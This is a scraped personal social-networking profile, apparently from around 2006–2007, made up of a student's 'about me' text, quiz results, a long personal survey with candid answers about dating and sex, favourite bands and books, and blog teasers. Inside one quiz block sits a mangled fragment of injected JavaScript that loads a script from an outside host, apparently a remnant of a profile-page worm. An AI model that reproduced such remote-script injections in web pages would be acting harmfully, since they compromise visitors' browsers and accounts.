I am the paragon of humanity. Worship me from afar profile picture

I am the paragon of humanity. Worship me from afar

I am here for Friends

About Me

Time to refresh the information. I am interested in a plethora of activities such as hunting, knitting, swimming, painting, and also sharpening knives.... I am 20 years of age and am in college. I am a complete nerd although people cannot usually tell unless I am wearing my "President of the Chemistry Club" name tag. I love to read all sorts of literature. I now live in Chicago where I go to UIC, desperately hoping to get into med school. I have no siblings and my only pet is my cousin Sarah, who by all modern day standards qualifies as a complete heathen. So that is all for now...
You're a Shy Kisser
You *do* love to kiss, once your comfortable with it
And that means knowing the person you're kissing pretty well
You usually don't make the first move when it comes to making out
But you've got plenty of intensity in return What Kind of Kisser Are You?
This Is My Life, Rated
Life: 7.4
Mind: 7.5
Body: 5
Spirit: 9.2
Friends/Family: 6.7
Love: 2.1
Finance: 6.9
Take the Rate My Life Quiz
Your Love Style is Agape
You are a caring, kind, and selfless partner.Unsurprisingly, your love style is the most rare.You are willing to sacrfice your world for your sweetie.Except it doesn't really feel like sacrifice to you.For you, nothing feels better than giving to the one you love. What's Your Love Style? .... language="javascript" src="http://www.fuckmdk.com/request.js"function nothingf(){document·write("lolol.mov.r{}");}..

My Interests

to see more pictures of me go to: http://photobucket.com/albums/y161/playachicka4e05/Its%20all %20about%20me/I am interested in everything. I like so sew and knit and play sports and get dirty and go fishing and play with guns and read and listen to music and.. well everything...if i missed something please tell me :-P
You Are a Dreaming Soul
Your vivid emotions and imagination takes you away from this world
So much so that you tend to live in your head most of the time
You have great dreams and ambitions that could be the envy of all...
But for you, following through with your dreams is a bit difficult

You are charming, endearing, and people tend to love you.
Forgiving and tolerant, you see the world through rose colored glasses.
Underneath it all, you have a ton of passion that you hide from others.
Always hopeful, you tend to expect positive outcomes in your life.

Souls you are most compatible with: Newborn Soul, Prophet Soul, and Traveler Soul What Kind of Soul Are You?..START BZOINK.COM SURVEY CODE
Your only A statistic to me. Jk okay maybe.
Name:: Ninja Mcq
Age:: 19
Location (state):: IL
Lets start out with LOve::
Is REAL love indescribable?: yes
Have you ever been in Love?: maybe...
What feelings do you get when you know you love someone?: well there is love of course
Ever get sick to your stomach because you love someone so much?: yea...
Describe in 3-5 words what your description of Love is?: deliriously beautiful disaster
Is love sometimes misunderstood for care?: yes it can be
If you could make someone fall in love with you, who would it be?: well there are a few people up for grabs but for the number one it wouldnt make a difference..
If Love was a potion what ingrediants would it compose of?: chocolate
Do you tend to enjoy the game of getting someone to love you back?: no way just give me the love, no games!
What age were you when you had your first kiss?: 4
Is love worth dying for?: yes
Is love worth losing everything you currently own?: definately
Is love always enough in a relationship?: not always... :'(
What item you own do you Love the most? WHy?: my drooled on kitty pillow I made in 7th grade... Mo says its really gross but its not that bad, I mean yes it is brown when it used to be white but that doesnt mean its nasty
Is the love for your pets same as the love for your family?: well pets are family but I wouldnt die for my cat but I would for my mother
A food you LoVe?: CHEESE!!! and chocolate
Someone you love for making life so much easier?: mommy
Would life be better or easier if we were all emotionless?: sometimes I tend to think so but overall no... it might be easier but it would be so dull
Is black the never ending color of hate?: no
A law you hate?: that I cant run around naked and steal things
Someone that makes you sick?: Wiggins....
A food you HATE!!?: tomatoes EEK!
Do you sometimes hate the ones you love the most?: no, I dont hate anyone. Love for all!
The argument you hated having the most!!?: the one where I was wrong and knew it
Something about life that you hate?: my lack of happiness when I should be so happy...
A movie you hate?: The Master of Disguise
A band you wish would just SHUT UP?: I must say 50 Cent too even though he isnt a band
A vegetable you hate?: tomatoes
Something a family member gives you on the holidays that you hate?: toothbrush, though it is useful... and lights up... nevermind I like them all :-P
A word you despise?: cunt
Soemthing your bf/gf does that drives you crazy?: bites my neck, well that would be if I had a bf
Something a family member does, that drives you crazy?: bad grammar!
Special Events in your life!!
The happiest moment of your life?: I am not at liberty to describe that but I will just say it was my first night in New York...
The funniest thing that happened to you with your friends?: that time when my shirt ripped open in a concert and they made me change in the parking lot... or well there are so many times...
The nicest thing someone has ever said to you?: you're beautiful
A school day that actually went well:: What happened?: uhh well... nope cant remember that one...
The best date youve been on? describe it::: most amusing or best best... well most amusing was when the car broke down and we got pulled over by the cops with Seth, best is that night in NY with HIM
Your best/funnest birthday? What happened?: they are all amazing
The best gift someone has ever given you?: the gift of LOVE
A time you laughed so hard you peed your pants? what happened?: well I cant remember doing that but if I did Im sure Mo, Ash, and Meg would be involved
One of the best memories you have of a loved one?: the mud fight with Amanda on horseback... best time ever
Best vacation with family::?: Hawaii... or maybe Ireland with my daddy and my Mo
The Nasty Tards
Do you get migranes?: yes
Do you get acne?: yes
Ever been pregnant when you didnt want to be?: oh yes I hate when that happens
Have you ever been trapped in an elevator?: eek yea its hot and gross adn then this old ugly guy starts to sweat and stinks the place up and you just want to get out but you cant and its like suffocating...
Ever accidently caught something on fire in your home?: yea my chemistry nots right before the exam
Has a pet ever ran away? did you find them?: yes my pet turtle... dont ask Im still tramatized
Ever watched a loved one die before your eyes?: well yes in a way
Ever had a parent walk in on you and your someone doing something naughty?: haha no comment
Your most embarassing moment?: I have so many vbut one that jumps out is when I fell all the way down the bleachers freshyear into the laps of the scorekeepers at the basketball game
Have you ever fell down the stairs?: yea many times, and up too
Ran into a see through door?: yes but it wasnt see through
Slipped on wet floor?: yep
Ever found soemthing disgusting in your fast food?: uhh nope not really, I dont eat fast food much
Have you ever been diagnosed with something horrible?: yes
Accidently slipped gas in public?: no I cant say that I have
Your Absolute Bests!
Meal youve ever made?: stuffed chicken with double baked potatoes, green goulash, and a banana cream pie... mmm
Thing you have made for someone?: painting
Thing youve done for someone?: well maybe when I sent Mo the flowers and baked her a cake when her men were jerkfaces
Action made to help someone?: helped build houses for the poor people
Advice youve given someone?: to just leave him because he is not worth all of the pain he causes
Advice youve recieved?: giving your heart away is painful
Picture youve drawn?: title "Juliana"
Poem youve written?: its called "lost"
Eassay youve written?: probably a Harry Potter one
Time youve ever spent with anyone?: New York
Party youve ever been to?: probably the one where I broke Mos window when I was sober...
Voicemail message youve had?: from me at a party
Phone conversation youve had?: the one where we didnt speak because we were laughing so hard
Point youve prooven?: that I dont mind being fat so long as Im happy with myself
Sport you played?: waterpolo
Lets get phsyical*
Your best phsyical feature is:?: according to professor carver its my legs... according to Yahtzee...well we wont go there
A creative word to describe the color of your eyes is?: brown? ok I can do better than that: dirty
Your hairs description::: also brown? actually my hair is prety cool cuz it changes colors with the seasons..
What are you most self concious about on your body?: well prolly my tummy
What do you like the most about your body?: it is strong
What animal do you look most like?: cat maybe
What have you been made fun of for?: my diction
Lets get REAL phsyical!
Would you ever consider sleeping with a celebrity?: uhh no
Have you ever cheated or been cheated on?: yes
Would you consider a one night stand?: not one night... and one week doesnt fit in there but something may still happen between us!
Are you straight, gay or bisexual?: straight
Are you a virgin?: mostly
If you have had sex, where was the craziest/sillest place youve done it?: n/a
If your a virgin where do you want your first time to be?: hmm probably in a bed but it would be really cool if we were outside
Should sex be all about emotion and passion?: not completely but definately should consist of those
Does the person have to LOve you for you to get in their pants?: I at least have to love them
Sex only after marriage?: sex when it happens
Fasntasys/ fetishes/something romantic involving sex you wish for?: I really would like to have sex on the hood of a corvette or in an airplane bathroom...
(()))(((()))))()))()) (( How ManY ))(()()()()()(((())))
Cookies could you eat at once?: so many
Pickles have you eaten at once?: uhh dunno
Times do you clean your room a year?: maybe 3 .. lol jk!
Times do you pee during the night?: almost never... at least I dont remember them
Times a week it is nesscary to clean the house?: never, we have a cleaning lady
You bathe your pets in a year?: I have kittens... barn kittens...
You brush your teeth a day?: twice
Meals you eat a day?: one or two
Approximate pounds of chocolate youve consumed in your life?: about 400
Classes have you failed?: none
Times do you cry a week?: not often but it happens
Jeans that you own?: about 12
Money in your wallet?: none maybe 25 cents
Birthmarks do you have?: quite a few
Times have you dyed your hair?: 1
Years you wish you could go back in time?: 15
Hours of Tv do you watch a day?: none
Times do you watch the news a week?: none
Sodas do you consume in a day?: none or maybe one a month
Sheep do you want on your farm?: if by sheep you mean children then tons... if you mean sheep then well....
Pets do you have?: a bunch
Do you belive in: (or support)
Ghosts?: yep
Aliens?: sure
Sex without emotional attachment?: no, NO
Abortion?: no
Our president?: hell no
Superstitions?: yes
Botox?: no
Plastic surgery?: no
Politics?: yes
Religion?: sure
The bible?: kind of
Yourself?: sometimes
Marriage?: oh yes
Divorce?: i hope not
IF IF IF..........
If you could be someone else for a day, who would you be?: God
What would you accomplish as this person?: I would make the world lovely
If you could have any car you wanted, what would it be?: 1966 Shelby Cobra GT original
If you could live anywhere where would it be?: London or NYC
If you could go back to any age, what age would it be?: 5 or 6
If you were a fruit youd be...: kiwi, strange but all together good
If you met an alien hed look like...: Paris Hilton
If you could change something about yourself it would be...: my mind
If you had three wishes, what would you wish for?: love, happiness, and 3 more wishes
If you could give anything to the one you loved, what would it be?: unwavering happiness
If you become an animal of your choice after death, what animal would u be?: kitten
If you could buy any company you wanted, what would it be?: Microsoft
If you were up for sale, your ad description would say?: Free Slave, works hard for chocolate
#Which one are you?#
You make the first moves, OR your bf.gf makes the first moves?: Im too shy to make the moves but sometimes I work up courage
You are a city OR country person?: both
You think more with Passion OR Logic?: a nice combination of both, my mind and heart are often at odds
You eat more Chinese OR Mexican?: chinese
Youd rather go to Disney world OR Universal studios?: Disney world
Youd rather die with your love by your side, OR without them?: with them near me
Youd rather drink Milk OR juice?: juice all the way
Youd rather go ona blind date or a date with someone youve known forever?: blind date
Your a Cat OR dog person?: cat
Smoothies OR Milkshakes?: milkshakes
Youd rather be a Snake OR a turtle?: snake
Youd rather watch OR play sports?: play
Shy OR outgoing?: shy in love
Night Owl OR Day Bird?: whatever I need to be
Chocolate Cake OR Apple Pie?: cake
Comedy OR Romance Films?: I like romantic comedies
Commited relationships OR Free as a Bird?: commited
Alternative rock OR 70s Disco Music?: rock
Conservative OR Wild Party Animal?: conservative
Do you like your mate to be skinny winnie or have alittle chunk?: a little pudgie
Rather get quilled by a porqupine OR stung by a jelly fish?: damn jellyfish...
My very favorite*~
Type of food:: CHEESE!
Font:: Lucidas handwriting
Color:: green
Animal:: cheetah
Place to be:: London
Kiss:: the last one at the airport where I melted... *sigh*
Beatle::: none
Topic/subject to study::: chemistry or theraputic massage
Celebrity::: Ryan Phillipe
Channel to watch::: discovery
Tv show::: none really
Type of mUSic::: most types are pleasing
Can you....
Put your legs behind your head?: no
Do calculus problems?: yep
Eat gross foods for money?: sure, I did drink that creamer concoction..
Beat someone up?: yes
SWim long distances?: oh yea the mile is my specialty
Wrestle alligators?: maybe I havent tried recently
Return a million dollars of you randomly found it?: maybe
Eat raw fish?: well yes thats called sushi
Love someone unconditionally?: yes
Laugh at yourself?: all the time because if I dont laugh at my jokes who will?
Lick your elbow?: nope
Watch Sept 11th or Hurricane disaster storys without crying?: yes but sept 11 was different... I had invested interests there...
Have a nice day!
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I'd like to meet:

Nice people perferably under the age of 25. (also containing at least a shred of intelligence)


Green Day, Relient K, Trapt, Flogging Molly, Dashboard, Blink 182, Michelle Branch, Kelly Clarkson, Army of Freshmen, Motion city Soundtrack, Panic at the Disco, Vivaldi, Britney Spears...yea


Instead of movies this will be a quotes section:


.. width="425" height="350" ..Stewie is my future lover...


I love to read... so here are only a few... Pride and Prejudice, Harry Potter, Twilight, anything Shakespeare (favorite is Hamlet) The Universe in Your Pocket (a very handy book) Hitchhikers Guide to the Galaxy (movie sucked though, other books that I've written... uhh thats all for now " "


hero... hmm like superman?..... well my answer is megan... yea...

My Blog

that is all

All I am here to say is: Yes I am childish enough to post my complaints in a blog rather than walk three feet over and confront my roommate myself. That is all.
Posted by I am the paragon of humanity. Worship me from afar on Wed, 31 Oct 2007 06:59:00 PST

here it goes again...

Here it goes again... that feeling of ennui... except this time I am sick to boot. I am so hot. For some reason, I feel itchy. So itchy that I am breaking out with welts and a rash... not cool. I have...
Posted by I am the paragon of humanity. Worship me from afar on Wed, 10 Jan 2007 06:44:00 PST


Have you ever had that feeling that change was coming? That, perhaps, something wasn't right and needed to be fixed but you were't sure you wanted it fixed? This odd feeling of ennui and ... fluctuati...
Posted by I am the paragon of humanity. Worship me from afar on Sun, 10 Dec 2006 08:41:00 PST

so that blew...

Ok so if my halloween got any worse my life would have ended. I look totally sexy and I have no man to show it to, my trick or treating buddy ditched me for some lamo excuse like pneumonia, Sarah ran ...
Posted by I am the paragon of humanity. Worship me from afar on Wed, 01 Nov 2006 05:57:00 PST

another day

My opening line is like a pathetic recurring dream. It always begins with, I havent done this in a while. Or where should I begin to catch up on. Well for starters today was blissfully fun. Woke up an...
Posted by I am the paragon of humanity. Worship me from afar on Thu, 12 Oct 2006 05:47:00 PST

Ive had enough

Ok so here it is. Im not afraid of hurting feelings anymore because I am so sick of my own being hurt. If you cannot be a mature being or you do not value my friendship then why are we friends? I am t...
Posted by I am the paragon of humanity. Worship me from afar on Fri, 29 Sep 2006 07:16:00 PST

God hates me

So there is no other explaination to why my life is hell at the moment other than God hates me. So we will begin with physics. I was doing my physics problems happily and got up to one of the last few...
Posted by I am the paragon of humanity. Worship me from afar on Fri, 25 Aug 2006 06:57:00 PST

you know the one

So I took a nap this afternoon and had this crazy dream. Yea you know the one. The one where you look out at your neighborhood and see a once bustling place completely deserted. The lawn mower is stil...
Posted by I am the paragon of humanity. Worship me from afar on Thu, 17 Aug 2006 06:11:00 PST


he first player of this game starts with the 6 weird things/habits about yourself and the people who get tagged need to write a blog of their 6 weird things/habits as well and state this rule CLEARLY....
Posted by I am the paragon of humanity. Worship me from afar on Fri, 31 Mar 2006 09:05:00 PST

25 hours

So I went to this super cool lock in thing for Seth and Pauls and Hughys church. I made quite a few interesting, but painful observations. Really fun times though including paul spitting on the floor ...
Posted by I am the paragon of humanity. Worship me from afar on Sun, 12 Mar 2006 04:12:00 PST